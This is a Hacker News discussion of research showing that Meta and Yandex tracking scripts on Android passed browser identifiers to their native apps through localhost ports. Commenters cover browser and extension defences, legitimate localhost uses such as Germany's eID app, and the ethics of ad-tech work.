They don't need to listen on localhost though.
I expose a LAN accessible status board from an app via HTTP. The app runs completely offline, thus I can't rely on something hosted on the public internet.
My last electron app did effectively the same thing. I took the hosted version of my app and bundled in electron for offline usage with the bundled app being just a normal web application started by electron.
Which begs the question why is this specific to Android? Why would Meta/Yandex not be doing this on iOS, or why did this study not report on iOS?
Doesn't iOS prompt you to give apps permission to connect to your local network? "App would like to find and connect to devices on your local network" or something along those lines. I always hit the "no thanks" button.
In this case it's the web browser connecting to the network, so the permission is irrelevant.
A long time ago I used it to work around an iOS limitation that prevented apps from simultaneously streaming audio and caching it. You could give the media player a URL for a remote stream, but you couldn’t read the same stream. The alternative was to get the stream yourself and implement your own media player. I didn’t want to write my own media player, so I requested the stream myself in order to cache it, plus fed it back to the OS media player via localhost http. Total hack, but it worked great. I wonder if they ever took that code out. It’s got hundreds of millions of installs at this point.
A comment I wrote in another HN thread [0] covering this issue:
Web apps talking to LAN resources is an attack vector which is surprisingly still left wide open by browsers these days. uBlock Origin has a filter list that prevents this called "Block Outsider Intrusion into LAN" under the "Privacy" filters [1], but it isn't enabled on a fresh install, it has to be opted into explicitly. It also has some built-in exemptions (visible in [1]) for domains like `figma.com` or `pcsupport.lenovo.com`.
There are some semi-legitimate uses, like Discord using it to check if the app is installed by scanning some high-number ports (6463-6472), but mainly it's used for fingerprinting by malicious actors like shown in the article.
Ebay for example uses port-scanning via a LexisNexis script for fingerprinting (they did in 2020 at least, unsure if they still do), allegedly for fraud prevention reasons [2].
I've contributed some to a cool Firefox extension called Port Authority [3][4] that's explicitly for blocking LAN intruding web requests that shows the portscan attempts it blocks. You can get practically the same results from just the uBlock Origin filter list, but I find it interesting to see blocked attempts at a more granular level too.
That said, both uBlock and Port Authority use WebExtensions' `webRequest` [5] API for filtering HTTP[S]/WS[S] requests. I'm unsure as to how the arcane webRTC tricks mentioned specifically relate to requests exposed to this API; it's possible they might circumvent the reach of available WebExtensions blocking methods, which wouldn't be good.
0: https://news.ycombinator.com/item?id=44170099
1: https://github.com/uBlockOrigin/uAssets/blob/master/filters/...
2: https://nullsweep.com/why-is-this-website-port-scanning-me/
3: https://addons.mozilla.org/firefox/addon/port-authority
4: https://github.com/ACK-J/Port_Authority
5: https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/Web...
There is a specification for blocking this:
https://wicg.github.io/private-network-access/
It gained support from WebKit:
https://github.com/WebKit/standards-positions/issues/163
…and Mozilla:
https://github.com/mozilla/standards-positions/issues/143
…and it was trialled in Blink:
https://developer.chrome.com/blog/private-network-access-upd...
Unfortunately, it’s now on hold due to compatibility problems:
https://developer.chrome.com/blog/pna-on-hold
Yep! Unfortunately its main method (as far as I remember from when I first read the proposal at least, it may do more) is adding preflight requests and headers to opt-in, which works for most cases yet doesn't block behind-the-lines collaborating apps like mentioned in the main article. If there's a listening app (like Meta was caught doing) that's expecting the requests, this doesn't do much to protect you.
EDIT: Looks like it does mention integrating into the permissions system [0], I guess I missed that. Glad they covered that consideration, then!
0: https://wicg.github.io/private-network-access/#integration-p...
Both Firefox [0] and Chrome [1] are working on successors which rely on permissions prompts instead of preflight requests.
[0] https://groups.google.com/a/mozilla.org/g/dev-platform/c/B8o...
[1] https://groups.google.com/a/chromium.org/g/blink-dev/c/CDy8L...
The Firefox bug referenced in [0] is open since 2018 (https://bugzilla.mozilla.org/show_bug.cgi?id=1481298)?!
What is so difficult about this?
0. Define 2 blocklists: one for local domains and one for local IP addresses
1. Add a per-origin permission next to the already existing camera, mic, midi, etc... Let's call it LocalNetworkAccess, set it false by default.
2. Add 2 checks in networking stack:
2a. Before DNS resolution check the origins LocalNetworkAccess permission. If false check the URL domain against a domain blocklist, deny the request if matches.
2b. Before the TCP or UDP connect check the the origins LocalNetworkAccess permission. If false check the remote IP address against an IP blocklist, deny the request if matches.
3. If a request was denied, prompt the user to allow or disallow the LocalNetworkAccess permission for the origin, the same way how camera, mic or midi permission is already prompted for.
This is a trivial solution, there is no way this takes more than 2-300 lines of code to implement in any browser engine. Why is it taking years?!
And then of course one can add browser-specific config options to customize the blocklists, but figure that out only after the imminent vulnerability has been fixed.
> There are some semi-legitimate uses, like Discord using it to check if the app is installed by scanning some high-number ports (6463-6472)
I would not consider this a legitimate use. Websites have no business knowing what apps you have installed.
I agree, yet at least you can kind of see where they're coming from.
I guess a better example would be the automatic hardware detection Lenovo Support offers [0] by pinging a local app (with some clear confirmation dialogs first). Asus seems to do the same thing.
uBlock Origin has a fair few explicit exceptions made [1] for cases like those (and other reasons) in their filter list to avoid breakages (notably Intel domains, the official Judiciary of Germany [2] (???), `figma.com`, `foldingathome.org`, etc).
0: https://pcsupport.lenovo.com/
1: https://github.com/uBlockOrigin/uAssets/blob/master/filters/...
2: https://github.com/uBlockOrigin/uAssets/issues/23388 and https://www.bundesjustizamt.de/EN/Home/Home_node.html (they're trying to talk to a local identity verification app seems like, yet I find it quite funny)
> the official Judiciary of Germany [2] (???)
That's the e-ID function of our personal ID cards (notably, NOT the passports). The user flow is:
1. a client (e.g. the Deutsche Rentenversicherung, Deutschland-ID, Bayern-ID, municipal authorities and a few private sector services as well) wishes to get cryptographically authenticated data about a person (name and address).
2. the web service redirects to Keycloak or another IDP solution
3. the IDP solution calls the localhost port with some details on what exactly is requested, what public key of the service is used, and a matching certificate signed by the Ministry of Interior.
4. The locally installed application ("AusweisApp") now opens and displays these details to the user. When the user wishes to proceed, the user clicks on a "proceed" button, and is then prompted to either insert the ID card into a NFC reader attached to the computer or a smartphone in the same network as the computer that also has the AusweisApp attached.
5. The ID card's chip verifies the certificate as well and asks for a PIN from the user
6. the user enters the PIN
7. the ID card chip now returns the data stored on it
8. the AusweisApp submits an encrypted payload back to the calling IDP
9. the IDP decrypts this data using its private key and redirects back to the actual application.
There is a bunch of cryptography additionally layered in the process that establishes a secure tunnel, but it's too complex to explain here.
In the end, it's a highly secure solution that makes sure that only with the right configuration and conditions being met the ID card actually responds with sensitive information - unlike, say, the Croatian ID card that will go as far as to deliver the picture on the card in digital form to anyone tapping your ID card on their phone. And that's also why it's impossible to implement in any other way - maaaaybe WebUSB but you'd need to ship an entire PC/SC stack and I'm not sure if WebUSB allows cleaving an USB device that already has a driver attached.
In addition, the ID card and the passport also contains an ICAO compliant method of obtaining the data in the MRZ, but I haven't read through the specs of that enough to actually implement this.
Zoom got busted for something similar five years ago now: https://www.zdnet.com/article/zoom-defends-use-of-local-web-...
IMO browsers should not just block the request but block the whole website with one of those scary giant red banners if something like this is attempted. If all websites get for trying to work around privacy protections is that their attempts might not succeed then there is little incentive not to try.
Your DNS server not resolving to localhost may also serve as an additional line of defense.
What does this have to do with the issue here? A website can just connect to 127.0.0.1 , no DNS needed.
I think what you are thinking of are dns rebinding attacks.
I built a little lan tool https://router.fyi that tries to get LAN data for a sort of online-nmap. depending on your browser, it's sometimes capable of finding wifi printers and a couple other smart home devices i've manually added.
Firefox about:config toggle media.peerconnection.enabled from true to false
Further, Netguard plus Nebulo in non-VPN mode can stop unwanted connections to Meta servers
Does about:config work on Firefox Android?
It works on Fennec from F-Droid.
What are some reasons to use Firefox Android instead of Firefox Nightly. The later is availlable from Aurora Store.
IME, Nightly has better add-on support. For example, uMatrix works.
Of course the ID was easy to abuse, and I assume Google knew this, and also knew they'd need to have rules against abuse... and that they'd need to back up the rules with penalties, like Play Store permaban, legal action for damages, and maybe even referral for criminal investigation (CFAA violation?).
Unfortunately, even if they did have such rules, in this case, Meta is a too-big-to-deplatform tech company.
(Also, even if it wasn't Meta, sketchy behavior of tech might have the secret endorsement of IC and/or LE. So, making the sketchiness stop could be difficult, and also difficult to talk about.)
Google and Apple are owning their whole operating systems. They can do tracking directly in 50 different ways. Other corporations routinely renegotiate deals on sharing the user surveillance data with them, for big big money. So it all has already been paid for, and authorised. The only problem is that some stupid serfs are still making a fuss over it.
Why don't all browsers, desktop and mobile, just block all cross-origin access to localhost?
For one I think it would break all those "update your BIOS via your motherboard website" apps that probably shouldn't exist anyways.
There probably are some legitimate uses, but I'm straining to come up with them.
Maybe just ask for confirmation
There's effort to define standard behavior here. See https://wicg.github.io/private-network-access/ (although I suspect this document may make a significant shift soon)
I thought they did for resources and JS, which is why Meta have to use WebRTC instead?
I think the Yandex one slips through because CORS does a naive check against just what's in the header, not what it resolves to?
I'm surprised browsers don't isolate each of the localhost/localnet/internet networks from each other. Are there any use-cases for allowing this?
If I recall correctly Figma uses it to connect to the locally installed app, and Discord definitely uses it to check if its desktop app is installed by scanning ports (6463-6472).
I'm aware of two blockers for LAN intrusions from public internet domains, uBlock Origin has a filter list called "Block Outsider Intrusion into LAN" [0] under the "Privacy" filters, and there's a cool Firefox extension called Port Authority [1][2] that does pretty much the same thing yet more specifically targeted and without the exclusions allowed by the uBlock filterlist (stuff like Figma's use is allowed through, as you can see in [0]). I've contributed some to Port Authority, too :)
0: https://github.com/uBlockOrigin/uAssets/blob/master/filters/...
1: https://addons.mozilla.org/firefox/addon/port-authority
2: https://github.com/ACK-J/Port_Authority
There are surely other ways to achieve this. If you are logged into an app and the site at tbe same time they can use the server to communicate. Discord doesn't need to know if the app is installed to work. That sounds sketchy.
It's just a way to ensure you open the desired context on a local Discord instance, not any instance that might be logged in to your account. I have a few personal computers logged in on Discord on the same account that could be active at the same time for example.
The native messaging feature is a much better way to talk to native apps, that should be used instead for modern browsers.
A commenter mentioned [1] that major Russian apps now all ask for permission to read a unique device ID to deanonymize users. The people that stopped Intel from adding such an ID to their CPUs had perfect foresight [2] (too bad later Intel added it anyway). But then it's not hard to guess that if you include a feature whose purpose is to attack the user, it will be used to attack the user.
[1] https://arstechnica.com/security/2025/06/meta-and-yandex-are...
[2] https://en.wikipedia.org/wiki/Pentium_III#Controversy_about_...
>A commenter mentioned [1] that major Russian apps now all ask for permission to read a unique device ID to deanonymize users.
To be fair it's not really limited to Russian apps. Many popular apps on play store have it as well:
https://play.google.com/store/apps/details?id=org.telegram.m...
https://play.google.com/store/apps/details?id=com.microsoft....
https://play.google.com/store/apps/details?id=com.pinterest&...
I love how the engineers and product managers who implemented this are not held responsible in any meaningful way.
Love the url slug: headline-to-come. It now redirects to a more boring one though.
If you work for meta, you're on the baddies team.
(Other bad guys are around too)
Not surprising, it's legal, but only if you are a multi-billion dollars company.
Probably hard to do for many but the solution seems be not to have their apps installed. It’s crazy to me that people tolerate FB et al on their devices where you have absolutely no control over what they’re doing.
I agree wrt Facebook, but there’s a long tail of useful apps-that-should-be-websites; 1 click for an app versus 45 seconds searching through tabs and re-logging in (etc) can be meaningful, especially when there are fifty of them.
My healthcare provider recently yanked the mobile version of their portal website, and forces users to download their app. Personally, I see the security angle, but still feel like it’s a punch in the face and so I just went back to paper billing and using a PC for healthcare stuff. More of this is coming, I suspect.
Yup. When I deleted the FB, X, and Reddit apps both my productivity and my phone's battery life skyrocketed.
I assume that's why those companies try to actively degrade the experience on the website.
Reddit has fairly intense device fingerprinting. And they sell data for AI training.
I'm using RethinkDNS as a combined firewall and wireguard VPN. I added these two block rules:
127.0.0.0/8
::1/128
I'll update here with any issues.
We changed the URL from https://arstechnica.com/security/2025/06/meta-and-yandex-are... which is a report about this disclosure.
No doubt, whatever "vulnerability" is found, you have already to agreed to it in some buried TOS.
Is there a similar thing on iOS? I always wonder when a random app asks to “find devices on my network”
Possible, but potentially not as practical due to the iOS’ restrictive background process model. There, background tasks are generally expected to quickly do whatever it is they need to and exit and generally can’t run indefinitely. Periodic tasks are scheduled by the OS, with scheduling requests from apps being more likely to be honored if their processes are well-behaved (quick, low resource, don’t crash, and don’t run too frequently) with badly-behaved processes getting run less often.
Apps that keep themselves open by reporting that they’re playing audio might be able to work around this, but it’d still be spotty since users frequently play media which would suspended those backgrounded apps and eventually bump them out of memory.
This is answered on the page.
It’s probably easier to buy that data directly from Apple.
Google’s core business is built on tracking data, so they would be reluctant to sell, necessitating covert collection.
Can you link the page where you can buy that data?
> That said, similar data sharing between iOS browsers and native apps is technically possible.
Does that work across profiles? I have to use some apps from such spyware oriented companies and usually put them in isolated profile with shelter.
I wonder whether local ports opened in isolated "work" android profile are accessible by main profile.
Sounds like loading from the domains serving the meta pixel should be blockable in the first place.
A quite obvious attack mechanism, I'm surprised browsers permitted this in the first place. I can't think of a reason to STUN/TURN to localhost. Aside from localhost, trackers can also use all other IP addresses available to the browser to bind their apps/send traffic to.
Now that the mechanism is known (and widely implemented), one could write an app to notify users about attempted tracking. All you need to do is to open the listed UDP ports and send a notification when UDP traffic comes in.
For shit and giggles I was pondering if it was possible to modify Android to hand out a different, temporary IPv6 address to every app and segment off any other interface that might be exposed just because of shit like this (and use CLAT or some fallback mechanism for IPv4 connectivity). I thought this stuff was just a theoretical problem because it would be silly to be so blatant about tracking, but Facebook proves me wrong once again.
I hope EU regulators take note and start fining the websites that load these trackers without consent, but I suspect they won't have the capacity to do it.
> modify Android to hand out a different, temporary IPv6 address to every app
AFAIK this is on the Android roadmap and one of the key reasons they don't want to support DHCPv6. They want each app to have their own IP.
> hand out a different, temporary IPv6 address to every app and segment off any other interface that might be expose
Yes, but (AFAIK) not out of the box (unless one of the security focused ROMs already supports this). The kernel supports network namespaces and there's plenty of documentation available explaining how to make use of those. However I don't know if typical android ROMs ship with the necessary tooling.
Approximately, you'd just need to patch the logic where zygote changes the PID to also configure and switch to a network namespace.
I've looked into network namespaces a bit but from what I can tell you need to do a lot of manual routing and other weird stuff to actually make IPv6 addresses reachable through them.
In theory all you need to do is have zygote constrain the app further with a network namespaces, and run a CLAT daemon for legacy networks, but in practice I'm not sure if that approach works well with 200 apps that each need their IPs rotated regularly.
Plus, you'd need to reconfigure the sandbox when switching between WiFi/5G/ethernet. Not impossible to overcome, but not the weekend project I'd hoped it would be.
I don't follow? Your system is either routing packets or not. IPv6 vs IPv4 should not be a notable difference here.
I've never tested network namespace scalability on a mobile device but I doubt a few hundred of them should break anything (famous last words).
In the primary namespace you will need to configure some very basic routing. You will also need a solution for assigning IP addresses. That solution needs to be able to rotate IP assignments when the external IP block changes. That's pretty standard DHCP stuff. On a desktop distro doing the equivalent with systemd-networkd is possible out of the box with only a handful of lines in a config file.
Honestly a lot of Docker network setups are much more complicated than this. The difficult part here is not the networking but rather patching the zygote logic and authoring a custom build of android that incorporates the changes.
"UPDATE: As of June 3rd 7:45 CEST, Meta/Facebook Pixel script is no longer sending any packets or requests to localhost. The code responsible for sending the _fbp cookie has been almost completely removed."
I'm surprised they're allowed to listen on UDP ports, IIRC this requires special permissions?
> The Meta (Facebook) Pixel JavaScript, when loaded in an Android mobile web browser, transmits the first-party _fbp cookie using WebRTC to UDP ports 12580–12585 to any app on the device that is listening on those ports.
Borders on criminal behavior.
Apparently this was a European team of researchers, which would mean that Meta very likely breached the GDPR and ePrivacy Directive. Let's hope this gets very expensive for Meta.
Nothing quite like an instant panicked coverup to confirm guilt and intent.
Hopefully not too late to make it into the lawsuit. Assholes.
As someone who works for a similar large org, it's just as likely that some low level programmer put it in without much thought, and then this got surfaces to higher up people who didn't know about it and told them to remove it immediately.
It seems incredibly unlikely a low level programmer could come up with this method then get the necessary code into both the tracking pixel served to third party sites and Meta's android apps without some higher ups knowing about it.
Zuckerberg personally signed off on torrenting books for Llama. It would be a particularly dim group of “low level” programmers who did this without trying to first secure some upper level approvals to share the blame once caught.
Or at the very least, a low level programmer not claiming credit for it during performance reviews which are reviewed by higher people.
You claim some low-level programmer created a feature that opens a new network connection between two separate applications?
Just some guy working at facebook was able to ship network code in not just one but two code-bases without any senior or higher engineers in the loop?
That's the claim? If that was true (it's not) it would be even worse than high level executives being involved.
Hopefully not too late to make it into the lawsuit. Assholes.
I sure hope there's a lawsuit. Over the last ten years, I've gotten over $2,000 in lawsuit settlement checks from Meta, alone.
I have a savings account at one of my banks that I use just for these settlement checks. Sometimes they're just $5. Sometimes they're a lot more. I think the most I ever got was around $500.
It's a little bit here, and a little bit there, but at the rate it's going, in another five years, I'll be able to buy a car with privacy violation money.
> The Meta (Facebook) Pixel JavaScript, when loaded in an Android mobile web browser, transmits the first-party _fbp cookie using WebRTC to UDP ports 12580–12585 to any app on the device that is listening on those ports.
And people on HN dismiss those who choose to browse with Javascript disabled.
There's a reason that the Javascript toggle is listed under the Security tab on Safari.
Worse, people on HN celebrate when websites add anti-bot protection that prevent you from accessing the website without JS.
These companies have demonstrated repeatedly that fines are just the cost of doing business. Doesn't matter if you charge them $1 million or $1 billion. They have still made significantly more than that from the crime.
The sum absolutely does matter. All you’re saying is the fines are too low
That's.. quite the contradictory sentence.
That's why fines should scale up geometrically with repeat offenses.
Simple question: would disabling apps from running in the background prevent this? Or, more simply, not staying logged into an app on your phone?
Yes, preventing the app from running in the background (entirely) would prevent it from listening on a port and collaborating with websites via this exploit.
As for the second part: no, logging out of the apps would not necessarily be enough. The apps can still link all the different web sessions together for surveillance purposes, whether or not they are also linked to an account within the app. Meta famously maintains "shadow profiles" of data not (yet) associated with a user of the service. Plus, the apps can trivially remember who was last logged in.
This just reinforced the use of uMatrix. Governments should mandate browser vendors to implement any standards gorhill might come up with.
Unfortunately in modern web uMatrix is just incredibly annoying. Nearly every site breaks for various reasons and often allowing everything in uMatrix still doesn't fix the issue.
Card payments, especially with 3D secure that use iframes, are one of the biggest problems. This often leads to creating new order several times since allowing something + reloading loses the entire flow.
Captchas are also massive pain, probably because they can't fingerprint as well as normally?
Life after having disabled uMatrix completely has been better.
If only uMatrix was still developed/supported.
It still works very well. I'm using it on both Linux and Android. The UI is far better than its replacement inside uBO.
The uBO functionality isn't a legitimate replacement. I don't understand how that came to pass.
Those extensions are from the same author. I don't know the details but maybe gorhill didn't have the time to maintain uMatrix anymore and added the very minimum uMatrix functionality to uBO and settled for that. Luckily uMatrix keeps working.
Sounds like blocking these tracking scripts using uBlockOrigin probably prevents this. Another reason to use uBlockOrigin.
Doing something like this should result in Meta and such being legally annihilated. But nothing will happen, as usual.
What's the crime?
Tracking users without their consent. This is a crime in the EU. It’s a crime that it’s not a crime in the US.
Unauthorized access to a computer system. I'm sure if I connected to some port on a computer belonging to Meta without them wanting it, that would be the crime I would be charged with. But somehow if Meta connects to a port on my phone without me agreeing to it, it's not a crime?
Yes.. and that listening service is their software that you installed on your device... So caveat emptor.
What function does Instagram provide with this WebRTC listener besides tracking?
People install Instagram to look at photos and reels, not to help facebook track them better.
If I put a crypto-mining script in a game I don't get to claim "well they installed the app" when people complain. The victims thought they were installing a game, not a crypto-miner.
Here, the victims thought they were installing a photo sharing application, not a tracking relay.
Found the meta PM that thought of this idea
Software that came preloaded with what sounds suspiciously like a rootkit to keep the background service running on some phones.
Please don't "don't that phone then" because it's the same all the way down to rotary telephones.
I still didn't consent to meta tracking me on my telephone. I understand the shadow profiles and tracking pixels and whatnot, but cmon.
Next year "actually meta was listening to conversations captured by android devices and using it to target ads"
Don't use a cellphone? Meta and Google track desktop web use. Don't use a computer? Okay, that's cool.
Spying on users, connecting their real life identities to their browsing history without their consent or knowledge?
stalking? Maybe even something in the ECPA
Crap like this is why I haven't had the Facebook or Instagram apps installed for years. I still have accounts, but I only visit them via the browser.
It just wants to make me bin my phone tbh. Thank God for RMS and Linus that at least you can run GNU and Linux on a laptop as there is little left outside the panopticon.
I am not going to register with FB because they now require a 3D face scan to use it.
And with all that tracking and spying on me, plus a boatload of voluntarily submitted data, and Facebook still can't/won't show me any relevant advertising. I mean, even from the corpo point of view. Whenever I open my feed to read something, I see a boatload of complete garbage ads. Like, they are neither enticing to me nor they are promoting something corpos may want to shove in my fae so I would remember, like some Coca-Cola or whatever product. But no, they have nothing.
I've just opened my feed in FB and let's see what ads will be today:
Group Dull Men's Club - some garbage meme dump, neither interesting nor selling any product or service.
Women emigrant group - I'm a male and in different location.
Rundown - some NN generated slop about NN industry
Car crash meme group from a different location.
Math picture meme group
LOTR meme group
Photo group with a theme I'm not interested
Repeat of the above
Another meme group
Roland-Garros page - I've never watched tennis or wrote about it. My profile has follows of a different sport pages altogether. None of those rise in the ads.
Another fact/meme group
Repeat
Repeat
Another fact/meme group
Expat group from incorrect location
And so on it goes. Like, who pays for all this junk? Who coordinates targeting? Why do they waste both their and mine capacity for something that useless both for me and Facebook? I would understood if FB had ads of products/services, or something that loosely follows by likes. But what they have is a total 100% miss. It's mindboggling.
I guess the meme group ads are to draw you in, once you follow them they get to push you actual ads and it costs them less because Facebook doesn't charge them, thinking you want to see the group's posts. It must work to some extent.
It actually bothers me it took so long to be discovered.
I'm incredibly glad this isn't occurring in the UK + EU, because GDPR and the huge fines levied against Meta in the past have scared them sufficiently into not doing this kind of behaviour.
I wonder if companies like Wetter Online (from whom we know that they're selling the location data to brokers [0]) or ad service providers which offer libraries do the same.
If it were so, Google should be knowingly be allowing this to happen and be a co-conspirator. I mean, they surveil our devices as if it were their home. Impossible that they're not aware.
[0] https://netzpolitik-org.translate.goog/2025/databroker-files...
If you are even mildly technical you NEED to have a Pihole + Tailscale setup on your home network and all devices. Block all this malware at the root.
Or change your DNS to use nextDns
Facebook is stealing people's data? No way.
I hope a judge gives them a warning.
So Meta apps are spyware. And Zuck agains has got his finger in his mouth and a cat on his lap.
All Meta software is spyware. Whether it's an app or a website, they are only in existence for you to be pacified to spend as much time on them as possible so they can hoover up your data. If those apps/websites provide you with anything useful, it is just as a ruse to get more data from you.
To me it's weird that they're willing to misuse browser APIs so blatantly for interprocess communication, when, as I understand it, server-side correlation using a combination of IP, battery level and screen dimensions probably already gets them 95% of the surveillance capability.
the invisible hand says they have to chase that last 5%, too
Why is this weird to you instead of being "of course they are" to you?
Ah yes, and every small Android dev is banned from Play and Admob for tiny unknown reasons, with no recourse or way to communicate with Google. But Meta here probably won't get any problems at all. They should be temporarily banned!
On many threads here regarding EU fines, I see the sentiment "The EU only fines US tech to make a quick buck!".
It could be an idea to, you know, stop doing these things. Would be great to see another few $billion fine for this one.
The us could fine US tech too.
I bet that most Americans would be ok with that, more privacy, more money for the state and less to the greedy bastards.
EU doesn’t have to be the cop of US technology, in fact it’s a bit pathetic to have another country policy your industry.
(R)ussia only punishes (R)ussian tech when it does not align with the party.
This is yet another reason for installing very few apps
The issue isn't the amount of apps but that they are from big tech store and closed source which for 99% of apps means they will spy for profit.
You can install all of f-droid.org apps and not a single one will do that.
The reason to install very few mobile apps is directly proportional to the effort companies exert to get you to do so.
And they push REALLY hard.
Another similar tracking vector that lets any app detect all installed apps by using android.intent.action.MAIN Query: https://support.google.com/googleplay/android-developer/thre... without the QUERY_ALL_PACKAGES permission.
No response from Google. Being used by dozens of apps in the wild.
Edit: Original Research link: https://peabee.substack.com/p/everyone-knows-what-apps-you-u... (HN: https://news.ycombinator.com/item?id=43518866 , 482 comments)
Incredible that this was locked.
dang likely got told not to upset the benefactors
Referring to the linked Google Developers thread.
Can you imagine the mental hoops you’d need to jump through as a developer to persuade yourself that this is a valid thing to implement?
Zero. People who work on ad-tech build ad-tech all day long, that's the entire job.
Seriously, why do you think all of the unquestionable things humanity has built have been built? It's because it's all just part of the job, for somebody.
People working at ad-tech question the things they're building just like the people at McDonalds flipping a burger are questioning the cholesterol levels of their customers. They're not.
Not many? You've never met a developer with a god complex?
My experience is that most developers just do as they are told.
Another reason why AI is so fascinatingly horrible: it’ll never question the moral impact of what you’re trying to do.
except claude was trying to rat out users in their newer trials. in the end, the best whistleblower could end up being the ai… not sure what that says about us though.
Get paid - it's one hoop.
I mean, it is kind of a cool work around. There's a lot of motivation in telling someone they can't do something where "hide and watch" is a pretty typical response. The creative thinking that comes up with ideas like this is not something to discourage. It is a shame that the effort is for such a shit purpose, but these "people" are not stupid, and not many other areas offer these kind of challenges.
> Meta and Yandex are de-anonymizing Android users' web browsing identifiers
Thank god that Microsoft and Google don't do this. Oh, wait... /s
What happened to all the hackers fighting for personal freedom and privacy? Meta paycheck too tasty?
We’re still fighting the fight. Turns out shifty assholes also figured out how to write code and get hired.
Thank you for your service!
In the early days of the information revolution, when computers were new and being nerdy was still seen (almost universally) as a bad thing, a very high proportion of computer enthusiasts were people already on the fringes of society, for one reason or another. For a large number of them, hacking was a way to express their preexisting antiestablishment tendencies. For a lot of them, they were also your basic angsty adolescents and young adults rebelling against The Man as soon as they found any way to do so.
As time went on, computers became more mainstream, and lots more people started using them as part of daily life. This didn't mean that the number of antiestablishment computer users or hackers went down—just that they were no longer nearly so high a percentage of the total number of computer users.
So the answer to "what happened to all the hackers fighting for personal freedom and privacy?" is kinda threefold:
1) They never went away. They're still here, at places like the EFF, fighting for our personal freedom and privacy. They're just much less noticeable in a world where everyone uses computers...and where many more of the prominent institutions actually know how to secure their networks.
2) They grew up. Captain Crunch, the famous phreaker, is 82 this year. Steve Wozniak is 74. And while, sure, some people reach that age and still maintain not merely a philosophy, but a practice, of activism, it's much harder to keep up, and even many of those whose principles do not change will shift to methods that stay more within the system (eg, supporting privacy legislation, or even running for office themselves).
3) They went to jail, were "scared straight", or died. The most prominent example of this group is, of course, Aaron Swartz, but many hacktivists will have had run-ins with the law, and of those many of them will have turned their back on the lifestyle to save themselves (even Captain Crunch was arrested and cooperated with the FBI).
Thanks for your thoughts! How can we create more hackers? I think the fear of punishment has really put a damper on things but not sure how that can be avoided.
Hacking isn't about crime. It's about exploration. There are lots of people showing "the youths" how interesting it is to break a lock or go around it. Basically, any time you can make a system do something fun, helpful, or interesting that it wasn't intended to do, that's hacking. You can be 100% law abiding with no fear of punishment and still get the full experience.
Well, note that my conclusion is largely that we have not, in fact, decreased the number of hackers, nor their proportion within the general population—just their proportion within the computer-using population, and that only by adding a large number of non-hackers to that population. I'm skeptical that we can ever increase the proportion of the population that has the hacker mindset much higher than it is without some kind of overall cultural shift (something that's beyond our power to affect).
But it's also unquestionably true that it's much easier to be a "hacker", in the sense we think of from the 1960s-80s, in a time and field where the hardware and software is simpler, more open, and less obfuscated. As such, I think it's probably not helpful to long for those bygone days—especially the "simpler" part—which we are clearly never getting back until and unless we make a breakthrough that is just as revolutionary as the transistor and the microchip were (and I'm skeptical as to whether that's possible, both in terms of what physics allow ever, and in terms of the shape of the corporate landscape now and for the foreseeable future). Honestly, a lot of the things that were possible back then, a lot of the incentive to get into hacking, was stuff that's actually hugely dangerous or invasive. Instead, I think it's better to focus on what we can do to improve the latter two parts of that equation: more open, less obfuscated.
Personally, I would say that the way toward that is pushing for, creating, and working on more open protocols and open standards, and insisting that those be used to enable more interoperability in place of proprietary formats and integration only with other software and hardware from the same company.
Who do you think found the issue?
Touché
at some point yah reach a cross road. either sellout and join big brother or join the wandering homeless hordes on the streets.
Eh. You can have a very comfortable career doing work that still lets you look at yourself in the mirror. You don’t have to choose to burn the world to pay the rent.
I agree with you but I also don’t. It’s a privilege to have the ability to choose which job you work.
Not in this case. If you’re qualified to get a job at a company who will pay you to sell out your neighbor, you’re qualified to get a job with a decent boss who’ll never ask you do to do this kind of thing, pays 90% as much, and is still many times the national average salary.
The alternatives are not doing evil vs starving. They’re getting paid well for doing evil, or getting paid well for doing good or at least neutral.
Ok you’ve convinced me!